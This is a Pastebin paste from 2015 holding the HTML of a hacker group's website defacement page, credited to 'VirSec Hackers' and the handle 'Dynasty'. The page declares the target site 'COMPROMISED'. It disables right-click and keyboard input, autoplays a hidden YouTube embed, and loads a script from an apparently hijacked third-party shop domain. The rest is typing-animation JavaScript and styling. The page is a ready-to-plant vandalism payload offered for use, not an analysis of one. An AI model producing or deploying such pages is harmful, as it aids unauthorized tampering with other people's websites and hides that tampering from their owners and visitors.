Advertisement
DjLvke

VirSec Deface Page [ HTML ]

Jul 21st, 2015
253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 15.10 KB | None | 0 0
  1.  
  2. <!doctype html>
  3. <head>
  4. <title>VirSec Hackers</title>
  5.   <link rel="SHORTCUT ICON" href="http://i.imgur.com/gW84ROT.png" type="image/gif">
  6.     <meta name="Author" content="Hacked By VirSec Hackers"/>
  7.     <meta name="copyright" content="VirSec Hackers"/>
  8.     <meta name="description" content="Website Hacked by VirSec Hackers."/>
  9.     <link href="http://fonts.googleapis.com/css?family=Abel" rel="stylesheet" type="text/css"/>
  10.     <link href="http://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css"/>
  11.     <link href="http://fonts.googleapis.com/css?family=Orbitron" rel="stylesheet" type="text/css"/>
  12.     <link href='http://fonts.googleapis.com/css?family=Abel:700' rel='stylesheet' type='text/css'>
  13.     <link href='http://fonts.googleapis.com/css?family=Abel:400' rel='stylesheet' type='text/css'>
  14.     <style type="text/css">body, a:hover {cursor: url(http://cur.cursors-4u.net/cursors/cur-9/cur862.ani), url(http://cur.cursors-4u.net/cursors/cur-9/cur862.png), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2011/11/22/night-diamond-bloody-red-link-select.html" target="_blank" title="Night Diamond Bloody Red - Link Select"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Night Diamond Bloody Red - Link Select" style="position:absolute; top: 0px; right: 0px;" /></a>
  15. <link href="http://fonts.googleapis.com/css?family=Orbitron:400,900" rel="stylesheet" type="text/css">
  16.     <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
  17.     <script type="text/javascript">
  18. ! function($) {
  19.  
  20.     "use strict";
  21.  
  22.     var Typed = function(el, options) {
  23. this.el = $(el);
  24.  this.options = $.extend({}, $.fn.typed.defaults, options);
  25.  this.isInput = this.el.is('input');
  26. this.attr = this.options.attr;
  27. this.showCursor = this.isInput ? false : this.options.showCursor;
  28. this.elContent = this.attr ? this.el.attr(this.attr) : this.el.text()
  29. this.contentType = this.options.contentType;
  30. this.typeSpeed = this.options.typeSpeed;
  31. this.startDelay = this.options.startDelay;
  32. this.backSpeed = this.options.backSpeed;
  33. this.backDelay = this.options.backDelay;
  34. this.strings = this.options.strings;
  35. this.strPos = 0;
  36. this.arrayPos = 0;
  37. this.stopNum = 0;
  38. this.loop = this.options.loop;
  39. this.loopCount = this.options.loopCount;
  40. this.curLoop = 0;
  41. this.stop = false;
  42. this.cursorChar = this.options.cursorChar;
  43. this.build();
  44. };
  45.  
  46.     Typed.prototype = {
  47.  
  48.         constructor: Typed
  49.         ,
  50. init: function() {
  51.  
  52.             var self = this;
  53.             self.timeout = setTimeout(function() {
  54.                 self.typewrite(self.strings[self.arrayPos], self.strPos);
  55.             }, self.startDelay);
  56.         }
  57.  
  58.         ,
  59.         build: function() {
  60.             if (this.showCursor === true) {
  61.                 this.cursor = $("<span class=\"typed-cursor\">" + this.cursorChar + "</span>");
  62.                 this.el.after(this.cursor);
  63.             }
  64.             this.init();
  65.         }
  66.  
  67.         ,
  68.         typewrite: function(curString, curStrPos) {
  69.             if (this.stop === true) {
  70.                 return;
  71.             }
  72.  
  73.             var humanize = Math.round(Math.random() * (100 - 30)) + this.typeSpeed;
  74.             var self = this;
  75.             self.timeout = setTimeout(function() {
  76.                 var charPause = 0;
  77.                 var substr = curString.substr(curStrPos);
  78.                 if (substr.charAt(0) === '^') {
  79.                     var skip = 1;
  80.                     if (/^\^\d+/.test(substr)) {
  81.                         substr = /\d+/.exec(substr)[0];
  82.                         skip += substr.length;
  83.                         charPause = parseInt(substr);
  84.                     }
  85.  
  86.                     curString = curString.substring(0, curStrPos) + curString.substring(curStrPos + skip);
  87.                 }
  88.  
  89.                 if (self.contentType === 'html') {
  90.                     var curChar = curString.substr(curStrPos).charAt(0)
  91.                     if (curChar === '<' || curChar === '&') {
  92.                        var tag = '';
  93.                        var endTag = '';
  94.                        if (curChar === '<') {
  95.                            endTag = '>'
  96.                         } else {
  97.                             endTag = ';'
  98.                         }
  99.                         while (curString.substr(curStrPos).charAt(0) !== endTag) {
  100.                             tag += curString.substr(curStrPos).charAt(0);
  101.                             curStrPos++;
  102.                         }
  103.                         curStrPos++;
  104.                         tag += endTag;
  105.                     }
  106.                 }
  107.  
  108.                 self.timeout = setTimeout(function() {
  109.                     if (curStrPos === curString.length) {
  110.                         self.options.onStringTyped(self.arrayPos);
  111.  
  112.                         if (self.arrayPos === self.strings.length - 1) {
  113.  
  114.                             self.options.callback();
  115.  
  116.                             self.curLoop++;
  117.  
  118.                             if (self.loop === false || self.curLoop === self.loopCount)
  119.                                 return;
  120.                         }
  121.  
  122.                         self.timeout = setTimeout(function() {
  123.                             self.backspace(curString, curStrPos);
  124.                         }, self.backDelay);
  125.                     } else {
  126.  
  127.                         if (curStrPos === 0)
  128.                             self.options.preStringTyped(self.arrayPos);
  129.  
  130.                         var nextString = curString.substr(0, curStrPos + 1);
  131.                         if (self.attr) {
  132.                             self.el.attr(self.attr, nextString);
  133.                         } else {
  134.                             if (self.isInput) {
  135.                                 self.el.val(nextString);
  136.                             } else if (self.contentType === 'html') {
  137.                                 self.el.html(nextString);
  138.                             } else {
  139.                                 self.el.text(nextString);
  140.                             }
  141.                         }
  142.  
  143.  
  144.                         curStrPos++;
  145.  
  146.                         self.typewrite(curString, curStrPos);
  147.                     }
  148.  
  149.                 }, charPause);
  150.  
  151.             }, humanize);
  152.  
  153.         }
  154.  
  155.         ,
  156.         backspace: function(curString, curStrPos) {
  157.             if (this.stop === true) {
  158.                 return;
  159.             }
  160.  
  161.             var humanize = Math.round(Math.random() * (100 - 30)) + this.backSpeed;
  162.             var self = this;
  163.  
  164.             self.timeout = setTimeout(function() {
  165.  
  166.                 if (self.contentType === 'html') {
  167.  
  168.                     if (curString.substr(curStrPos).charAt(0) === '>') {
  169.                         var tag = '';
  170.                         while (curString.substr(curStrPos).charAt(0) !== '<') {
  171.                            tag -= curString.substr(curStrPos).charAt(0);
  172.                            curStrPos--;
  173.                        }
  174.                        curStrPos--;
  175.                        tag += '<';
  176.                    }
  177.                }
  178.                var nextString = curString.substr(0, curStrPos);
  179.                if (self.attr) {
  180.                    self.el.attr(self.attr, nextString);
  181.                } else {
  182.                    if (self.isInput) {
  183.                        self.el.val(nextString);
  184.                    } else if (self.contentType === 'html') {
  185.                        self.el.html(nextString);
  186.                    } else {
  187.                        self.el.text(nextString);
  188.                    }
  189.                }
  190.                if (curStrPos > self.stopNum) {
  191.  
  192.                     curStrPos--;
  193.  
  194.                     self.backspace(curString, curStrPos);
  195.                 }
  196.  
  197.                 else if (curStrPos <= self.stopNum) {
  198.                    self.arrayPos++;
  199.  
  200.                    if (self.arrayPos === self.strings.length) {
  201.                        self.arrayPos = 0;
  202.                        self.init();
  203.                    } else
  204.                        self.typewrite(self.strings[self.arrayPos], curStrPos);
  205.                }
  206.  
  207.            }, humanize);
  208.  
  209.        }
  210.  
  211.        ,
  212.        reset: function() {
  213.            var self = this;
  214.            clearInterval(self.timeout);
  215.            var id = this.el.attr('id');
  216.            this.el.after('<span id="' + id + '"/>')
  217.             this.el.remove();
  218.             if (typeof this.cursor !== 'undefined') {
  219.                 this.cursor.remove();
  220.             }
  221.             self.options.resetCallback();
  222.         }
  223.  
  224.     };
  225.  
  226.     $.fn.typed = function(option) {
  227.         return this.each(function() {
  228.             var $this = $(this),
  229.                 data = $this.data('typed'),
  230.                 options = typeof option == 'object' && option;
  231.             if (!data) $this.data('typed', (data = new Typed(this, options)));
  232.             if (typeof option == 'string') data[option]();
  233.         });
  234.     };
  235.  
  236.     $.fn.typed.defaults = {
  237.         strings: [""],
  238.         typeSpeed: 0,
  239.         startDelay: 0,
  240.         backSpeed: 0,
  241.         backDelay: 500,
  242.         // loop
  243.         loop: false,
  244.         // false = infinite
  245.         loopCount: false,
  246.         showCursor: true,
  247.         cursorChar: "|",
  248.         attr: null,
  249.         contentType: 'html',
  250.         callback: function() {},
  251.         preStringTyped: function() {},
  252.         onStringTyped: function() {},
  253.         resetCallback: function() {}
  254.     };
  255.  
  256.  
  257. }(window.jQuery);
  258. </script>
  259.     <script>
  260.     $(function(){
  261.  
  262.         $("#typed").typed({
  263.             strings: ["BloodSecurity Hackers, Skw4t3R"],
  264.             typeSpeed: 100,
  265.             backDelay: 1000,
  266.             loop: true,
  267.             contentType: 'html',
  268.  
  269.             loopCount: false,
  270.             callback: function(){ foo(); },
  271.             resetCallback: function() { newTyped(); }
  272.         });
  273.  
  274.         $(".reset").click(function(){
  275.             $("#typed").typed('reset');
  276.         });
  277.  
  278.     });
  279.  
  280.     function newTyped(){  }
  281.  
  282.     function foo(){ console.log("Callback"); }
  283.  
  284.     </script>
  285.    
  286.     <style>
  287. body {
  288. background-color:black;
  289. color:white;
  290. font-family: Orbitron !important;
  291. }
  292.  
  293. a {
  294. color:green;
  295.   text-decoration: none;
  296.   cursor:pointer;
  297. }
  298. a:hover { color:orange;}
  299.  
  300.  
  301. .type-wrap{
  302.     margin:10px auto;
  303.     padding:20px;
  304.     }
  305.  
  306.     .grp {
  307.         color: white;
  308.         font-size: 72px;
  309.         text-shadow: 0px 0px 8px red,0px 0px 8px red;
  310.         }
  311. #rotate {
  312.       -webkit-animation: rotatePositive 5s infinite linear;
  313.       -moz-animation: rotatePositive 5s infinite linear;
  314.       -ms-animation: rotatePositive 5s infinite linear;
  315.       -o-animation: rotatePositive 5s infinite linear;
  316.       animation: rotatePositive 5s infinite linear;
  317.         }
  318.  
  319.   @-webkit-keyframes rotatePositive {
  320.       0% { -webkit-transform: rotatey(0deg); }
  321.       100% { -webkit-transform: rotatey(360deg); }
  322.   }
  323.  
  324.   @-moz-keyframes rotatePositive {
  325.       0% { -moz-transform: rotatey(0deg); }
  326.       100% { -moz-transform: rotatey(360deg); }
  327.   }
  328.  
  329.   @-ms-keyframes rotatePositive {
  330.       0% { -ms-transform: rotatey(0deg); }
  331.       100% { -ms-transform: rotatey(360deg); }
  332.   }
  333.  
  334.   @-o-keyframes rotatePositive {
  335.       0% { -o-transform: rotatey(0deg); }
  336.       100% { -o-transform: rotatey(360deg); }
  337.   }
  338.  
  339.   @keyframes rotatePositive {
  340.       0% { transform: rotatey(0deg); }
  341.       100% { transform: rotatey(360deg); }
  342.   }
  343.     #blink {text-decoration:blink;
  344. -webkit-animation-name: blink;
  345. -webkit-animation-iteration-count: infinite;
  346. -webkit-animation-timing-function: cubic-bezier(1.0,0,0,1.0);
  347. -webkit-animation-duration: 1s;
  348. }
  349. .typed-cursor{
  350.             opacity: 1;
  351.             font-weight: 100;
  352.             -webkit-animation: blink 0.7s infinite;
  353.             -moz-animation: blink 0.7s infinite;
  354.             -ms-animation: blink 0.7s infinite;
  355.             -o-animation: blink 0.7s infinite;
  356.             animation: blink 0.7s infinite;
  357.         }
  358.         @-keyframes blink{
  359.             0% { opacity:1; }
  360.             50% { opacity:0; }
  361.             100% { opacity:1; }
  362.         }
  363.         @-webkit-keyframes blink{
  364.             0% { opacity:1; }
  365.             50% { opacity:0; }
  366.             100% { opacity:1; }
  367.         }
  368.         @-moz-keyframes blink{
  369.             0% { opacity:1; }
  370.             50% { opacity:0; }
  371.             100% { opacity:1; }
  372.         }
  373.         @-ms-keyframes blink{
  374.             0% { opacity:1; }
  375.             50% { opacity:0; }
  376.             100% { opacity:1; }
  377.         }
  378.         @-o-keyframes blink{
  379.             0% { opacity:1; }
  380.             50% { opacity:0; }
  381.             100% { opacity:1; }
  382.         }
  383. #plate{
  384.   position: absolute;!important;
  385.     top:0!important;
  386.    
  387.     left:0!important;
  388.  width:100%;
  389.  height:100%;
  390.     overflow:hidden!important;
  391.     z-index:-1!important;
  392.     margin:0;
  393.     padding:0;
  394.     position:fixed;
  395.     opacity:0.6;
  396. }
  397.  
  398. .hackBody{
  399.   min-height:550px;
  400. }
  401.  
  402. .container
  403. {
  404. margin-top:10px;
  405. }
  406.     </style>
  407. </head>
  408. <body>
  409. <div align="center">
  410. <div class="container">
  411.     <div class="hackBody">
  412.     <div id="plate">
  413.     <canvas id="can" class="transparent_class"></canvas>
  414.     </div> <script src="http://www.nycfragrance.com/csvcategoryimportver1.0.3/system/css/layout/js/crazyIntro.js"></script>
  415.  
  416. <body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>
  417.  
  418. <iframe width="1" height="1" src="http://www.youtube.com/embed/i_kF4zLNKio?rel=0&autoplay=1&loop=1&playlist=i_kF4zLNKio" frameborder="0" allowfullscreen></iframe>
  419. <center>
  420.     <a href="#"><img src="http://i.imgur.com/gW84ROT.png" width="20%"></a>
  421.     <div class="h1"><font size="12px"><b>VirSec</b> <span style="color:white ; text-shadow: #000 3px 3px 5px"><b>Hackers</b></span></div></font>
  422.     <div class="h2"><font size="6px"><b>Hacked By <span style="color:Orange ; text-shadow: #000 3px 3px 5px">Dynasty</b></div><br></font>
  423.     <div class="h5">The page you are looking for has been <font color="orange">COMPROMISED.</font></div>
  424.     <div class="h5">by <font color="orange">VirSec Hackers</font>
  425.     <div class="h3">
  426.     <center><font color="white">
  427.     NO DELETED FILES, RECOVER ON YOUR OWN </b>
  428.     </font>
  429.     </center>
  430.     </div><br>
  431. <ul class="cbdb-menu">
  432. </ul>      
  433.     <embed width="600" height="40" align="middle" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" wmode="transparent" quality="high" src="http://www.widgeo.net/effets/2.swf" flashvars="letter=WE NEVER FAIL"></br>  
  434.     <br>
  435.     <div class="h4"><font color="white">-:-</font><b>With:</b><font color="white">-:-</font></div>
  436.     <center><div style="width:500px"><marquee behavior="scroll" direction="left" scrollamount="4" scrolldelay="55" width="100%">
  437. <font size="5px" style="font-family: Iceberg, sans-serif;color:black;text-shadow: 0 0 3px orange, 0px 0px 5px orange" >- Dyn4sty -  X - MR.S3CRETO - Solus -  -  -  -  -  -  -  -  -  -  -  -  -  -  -   -  -  -    -  -  -  -  -  -  -   -  -  -</font></marquee></div></center>
  438.     </div>
  439. </center>
  440. <span style="font-family:Orbitron;color:white;font-size:10px;text-shadow: 0px 0px 1px orange">
  441.     Designed &nbsp;by&nbsp;Dyn4sty&nbsp;&nbsp;|&nbsp;&copy;Copyrights&nbsp; 2015&nbsp; All Rights Reserved &nbsp;|&nbsp; #VirusSecurityHackers</font>
  442. </footer>
  443. </div>
  444. </body>
  445. </html>
  446.  
  447. </body>
  448. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement